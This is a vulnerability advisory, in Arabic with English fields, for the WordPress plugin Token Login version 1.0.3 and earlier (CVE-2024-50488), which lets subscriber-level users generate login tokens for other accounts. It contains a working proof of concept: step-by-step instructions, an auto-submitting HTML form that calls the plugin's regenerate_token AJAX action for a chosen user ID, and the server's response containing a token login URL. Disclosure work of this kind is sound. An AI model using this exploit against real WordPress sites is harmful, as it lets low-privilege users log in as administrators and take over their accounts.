
Token Login <= 1.0.3 - تصعيد امتيازات للمستخدمين الموثّقين (مشترك+)
تسجيل الدخول بالرمز <= 1.0.3 - تصعيد الامتيازات للمستخدمين المصادق عليهم (مشترك+)
المكوّن الإضافي 'تسجيل الدخول التلقائي باستخدام رابط مميّز آمن. تقييد تسجيل الدخول حسب الدور' لـ WordPress معرّض لتصعيد الامتيازات عبر الاستيلاء على الحساب في جميع الإصدارات حتى 1.0.3. يعود السبب إلى أن المكوّن لا يتحقق بشكل صحيح مما إذا كان المستخدم لديه صلاحيات لإنشاء رمز تسجيل دخول لمستخدمين آخرين. وهذا يجعل من الممكن للمهاجمين المصادق عليهم، بمستوى وصول المشتركين فما فوق، تسجيل الدخول كمستخدمين آخرين بما في ذلك المسؤولين.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
قم بتسجيل الدخول ثم شغّل هذا النموذج HTML. غيّر الرابط إلى موقع WordPress الذي سجلت الدخول عليه. غيّر المعرف (ID) إلى المستخدم الذي تريد إنشاء الرمز له. انسخ الرابط ويمكنك تسجيل الدخول باسمهم
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Responce
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}